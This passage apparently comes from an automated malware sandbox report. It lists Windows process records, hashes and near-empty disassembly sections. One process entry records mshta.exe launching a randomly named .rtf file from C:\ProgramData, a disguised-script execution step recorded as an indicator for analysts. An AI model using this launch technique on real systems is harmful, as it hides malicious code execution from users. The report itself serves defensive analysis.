                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:00:44:47
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      Imagebase:0x7ff757be0000
                                                                                                                                      File size:488448 bytes
                                                                                                                                      MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      General

                                                                                                                                      Start time:00:44:47
                                                                                                                                      Start date:02/12/2021
                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:mshta C:\ProgramData\vqcMnINBAOOJC.rtf
                                                                                                                                      Imagebase:0x7ff7b2d80000
                                                                                                                                      File size:14848 bytes
                                                                                                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                        Executed Functions

                                                                                                                                        Non-executed Functions

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.787249500.000000000F81F000.00000004.00000001.sdmp, Offset: 0F81F000, based on PE: false
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.663345173.000000000F932000.00000004.00000001.sdmp, Offset: 0F932000, based on PE: false
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.663345173.000000000F932000.00000004.00000001.sdmp, Offset: 0F932000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5f62ee0d15f17f0b02a0e4f51fd343bb1063bc28988a1653bdc0e0fbbde39dd9
                                                                                                                                        • Instruction ID: dd6c9a675b2640a9e195f74944783022a43498b46bfb9ff005d30ac4fe6bddcd
                                                                                                                                        • Opcode Fuzzy Hash: 5f62ee0d15f17f0b02a0e4f51fd343bb1063bc28988a1653bdc0e0fbbde39dd9
                                                                                                                                        • Instruction Fuzzy Hash: B5B10EA290D7A29FD3138F708CE67917FA1AF23705F5A48DAC0D18E5E7E615C80AC746
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%